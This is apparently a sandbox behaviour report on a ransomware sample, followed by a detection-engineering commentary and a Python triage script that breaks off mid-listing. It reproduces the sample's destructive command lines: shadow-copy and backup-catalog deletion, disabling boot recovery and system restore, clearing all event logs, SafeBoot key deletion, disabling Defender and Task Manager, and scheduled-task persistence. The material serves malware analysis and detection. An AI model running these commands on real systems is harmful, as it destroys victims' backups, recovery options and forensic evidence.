C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe (depth 3): reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 3): cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exe (depth 4): icacls * /grant Everyone:(OI)(CI)F /T /C /Q
- Modifies file permissions
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/
-
C:\Windows\system32\cmd.exe (depth 3): cmd.exe /c vssadmin Delete Shadows /All /Quiet
-
C:\Windows\system32\vssadmin.exe (depth 4): vssadmin Delete Shadows /All /Quiet
- Interacts with shadow copies
-
C:\Windows\System32\Wbem\WMIC.exe (depth 3): wmic shadowcopy delete
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\bcdedit.exe (depth 3): bcdedit /set {default} boostatuspolicy ignoreallfailures
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exe (depth 3): bcdedit /set {default} recoveryenabled no
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\wbadmin.exe (depth 3): wbadmin delete catalog -quiet/
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label D: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label D: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label E: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label E: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label F: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label F: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label G: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label G: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label H: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label H: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label I: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label I: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label J: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label J: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label K: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label K: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label L: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label L: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label M: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label M: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label N: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label N: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label A: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label A: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label B: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label B: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label O: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label O: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label P: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label P: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label Q: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label Q: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label R: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label R: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label S: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label S: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label T: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label T: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label U: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label U: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label V: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label V: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label W: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label W: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label X: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label X: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label Y: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label Y: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label Z: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label Z: XINOF
- Enumerates connected drives
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Label C: XINOF
-
C:\Windows\system32\label.exe (depth 3): Label C: XINOF
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
-
C:\Windows\system32\reg.exe (depth 3): reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c for / F "tokens=*" %%s in('wevtutil.exe el') DO wevtutil.exe cl "%%s"
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c start XinofSetup.bat
-
C:\Windows\system32\cmd.exe (depth 3): C:\Windows\system32\cmd.exe /K XinofSetup.bat
-
C:\Windows\system32\PING.EXE (depth 4): ping localhost.com -n 1
- Runs ping.exe
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c Powershell Start XinofSetup.bat -Verb Runas
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3): Powershell Start XinofSetup.bat -Verb Runas
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 4): "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat"
-
C:\Windows\system32\PING.EXE (depth 5): ping localhost.com -n 1
- Runs ping.exe
-
C:\Windows\system32\cmd.exe (depth 2): C:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"
-
C:\Windows\SysWOW64\mshta.exe (depth 3): "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta"
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\WerFault.exe (depth 1): C:\Windows\system32\WerFault.exe -u -p 1228 -s 1400
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Explorer.EXE (depth 2): "C:\Windows\Explorer.EXE"
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\vssvc.exe (depth 1): C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
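The process tree above is the whole value of this report for a detection engineer: the sample does not hide its intent in code, it spawns cmd.exe and reg.exe with plain command lines. Three details in the captured commands matter when writing rules against them. First, the bcdedit option is spelled "boostatuspolicy" in the capture (bcdedit's real option is bootstatuspolicy), so a rule that matches only the correctly spelled option misses this run; matching on the value "ignoreallfailures" or on "recoveryenabled no" does not. Second, the Run and RunOnce values expand "%temp%Fonix.exe" to "C:\Users\Admin\AppData\Local\TempFonix.exe" (no backslash), so the persistence entries point at a path the dropper never wrote; detect on the write itself rather than on whether the target exists. Third, the SafeBoot deletion is issued once under HKEY_CURRENT_USER, a location Windows does not consult for safe mode (the SafeBoot list lives under HKLM\SYSTEM), and once under HKEY_LOCAL_MACHINE, which is the one that counts. The triage script below is an added example and is not part of the sandbox report; it classifies command lines copied from the tree above into behaviour tags using patterns loose enough to survive those typos, and flags the shadow-copy plus boot-recovery combination that separates ransomware from routine backup housekeeping. The tag names and the rule set are this example's own choice, not the sandbox's signatures.

```python
import re
from collections import defaultdict

# Command lines copied from the process tree above (a subset). The operator's
# own typos ("boostatuspolicy", "%temp%Fonix.exe", "-quiet/") are kept verbatim
# on purpose: rules have to match what actually ran, not what was intended.
CAPTURED = [
    r'schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/Fonix.exe /RU SYSTEM /RL HIGHEST /F',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F',
    r'icacls * /grant Everyone:(OI)(CI)F /T /C /Q',
    r'vssadmin Delete Shadows /All /Quiet',
    r'wmic shadowcopy delete',
    r'bcdedit /set {default} boostatuspolicy ignoreallfailures',
    r'bcdedit /set {default} recoveryenabled no',
    r'wbadmin delete catalog -quiet/',
    r'Label D: XINOF',
    r'reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f',
    r'''for / F "tokens=*" %%s in('wevtutil.exe el') DO wevtutil.exe cl "%%s"''',
    r'ping localhost.com -n 1',
]

# (tag, pattern). Patterns key on the effect of a command, not on its exact
# spelling, so that mistyped option names still classify correctly.
RULES = [
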